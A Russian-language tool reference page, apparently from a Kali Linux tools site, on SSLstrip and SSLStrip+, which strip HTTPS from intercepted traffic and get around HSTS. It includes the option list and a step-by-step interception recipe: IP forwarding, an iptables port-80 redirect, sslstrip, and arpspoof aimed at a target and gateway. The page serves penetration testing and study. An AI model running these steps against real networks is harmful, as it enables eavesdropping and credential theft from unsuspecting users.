You are here: Home » Sniffing и Spoofing » SSLstrip (SSLStrip+)

SSLstrip (SSLStrip+)

Описание SSLstrip

sslstrip — это инструмент, который незаметно перехватывает HTTP трафик в сети, следит за HTTPS ссылками и редиректами, а затем сопоставляет эти ссылки их HTTP двойникам или омографически сходным HTTPS сслыкам. Он также поддерживает режимы для подачи иконки сайта (favicon), которая выглядит как иконка замка, выборочное ведение журнала и отклонение сессий.

Домашняя страница: http://www.thoughtcrime.org/software/sslstrip/

Автор: Moxie Marlinspike

Лицения: GPLv3

Описание SSLStrip+

Это новая версия SSLstrip с новой функцией обхода механизма защиты HTTP Strict Transport Security (HSTS).

Эта версия, как и оригинальная, меняет HTTPS на HTTP плюс имя хоста в html коде для избежания HSTS.

Для того, чтобы она работала, также нужен DNS сервер, который возвращает вспять изменения, сделанный прокси. Таким DNS сервером является dns2proxy.

Домашняя страница: https://github.com/singe/sslstrip2/ (доступный форк). Первоначально программа была опубликована автором по адресу https://github.com/LeonardoNve/sslstrip2, но из-за нового испанского закона, запрещающего публикацию "наступательных" инструментов/техник в сфере безопасности, он был вынужден удалить исходный код.

Автор: LeonardoNve

Лицения: GPLv3

Справка по SSLstrip

Использование:

sslstrip <опции>
Опции:
-w <имя_файла>, --write=<мя_файла> Задаёт файл для лога (опционально).
-p , --post                       Записывать в журнал только SSL POST. (по умолчанию)
-s , --ssl                        Записывать весь SSL трафик к и от сервера.
-a , --all                        Записывать весь SSL и HTTP трафик к и от сервера.
-l <порт>, --listen=<порт>        Порт для прослушивания (по умолчанию 10000).
-f , --favicon                    Подменить иконку сайта на замок для безопасных запросов.
-k , --killsessions               Убить текущие сессии.
-h                                Напечатать это сообщение помощи.

Руководство по SSLstrip

Страница man присутствует, но полностью повторяет справку.

Как работает sslstrip?

Во-первых, arpspoof убеждает хост, что наш MAC адрес — это MAC адрес роутера, и цель начинает отправлять нам весь сетевой трафик. Ядро перенаправляет всё, кроме трафика предназначенного для порта 80, который перенаправляется в $listenPort (10000, например).

Таким образом sslstrip получает трафик и делает свою магию.

Примеры запуска SSLstrip

Записать результаты в файл (-w sslstrip.log), прослушивать на порту 8080 (-l 8080):

root@kali:~# sslstrip -w sslstrip.log -l 8080

sslstrip 0.9 by Moxie Marlinspike running...

Запуск sslstrip

Переключите вашу машину в режим пересылки (форвардинга).

echo "1" > /proc/sys/net/ipv4/ip_forward

Настройте iptables для редиректа HTTP трафика на sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Запустите sslstrip.

sslstrip.py -l <listenPort>

Запустите arpspoof, чтобы убедить сети, что им следует отправлять их трафик вам.

arpspoof -i <interface> -t <targetIP> <gatewayIP>

Установка SSLstrip

Программа предустановлена в Kali Linux.

Установка sslstrip в Linux

Требования

  • Python >= 2.5 (apt-get install python)
  • Модуль python "twisted-web" (apt-get install python-twisted-web)

Установка

tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9

(опционально)

sudo python ./setup.py install

Скриншоты SSLstrip

Это утилита командной строки.

Инструкции по SSLstrip

Близкие программы:

Рекомендуемые статьи: